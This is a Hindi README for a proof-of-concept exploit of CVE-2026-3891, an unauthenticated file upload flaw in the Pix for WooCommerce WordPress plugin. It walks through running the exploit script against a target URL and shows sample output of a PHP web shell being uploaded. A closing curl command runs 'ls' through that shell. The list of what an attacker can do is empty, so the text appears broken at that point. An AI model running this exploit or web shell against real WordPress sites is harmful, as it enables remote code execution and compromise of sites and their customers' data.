
CVE-2026-3891 के लिए PoC — Pix for WooCommerce <= 1.5.0 में अनधिकृत मनमाना फ़ाइल अपलोड जो रिमोट कोड एक्ज़ीक्यूशन की ओर ले जाता है
CVE-2026-3891 एक महत्वपूर्ण अप्रमाणित मनमाना फ़ाइल अपलोड कमजोरी है जो Pix for WooCommerce WordPress प्लगइन में संस्करण 1.5.0 तक और सहित में पाई गई है।
यह कमजोरी lkn_pix_for_woocommerce_c6_save_settings कार्यक्षमता में मौजूद है, जो अनधिकृत नियंत्रणों की कमी और अपर्याप्त फ़ाइल प्रकार सत्यापन के कारण है। यह शोषण एक वैध नॉन्स प्राप्त करने और PHP फ़ाइल को वेब-सुलभ निर्देशिका में अप्रतिबंधित अपलोड प्रदर्शित करने की प्रक्रिया को स्वचालित करता है।
इस कमजोरी का लाभ उठाकर, एक अप्रमाणित हमलावर निम्नलिखित कर सकता है:
pip install requests
CVE-2026-3891.py फ़ाइल सहेजें।python CVE-2026-3891.py
संकेत मिलने पर लक्ष्य WordPress URL दर्ज करें:
[?] Enter target URL: http://localhost/wordpress
उदाहरण:
[*] Requesting nonce...
[+] Nonce obtained: **********
[*] Uploading woocommerce.php...
[+] File uploaded successfully!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
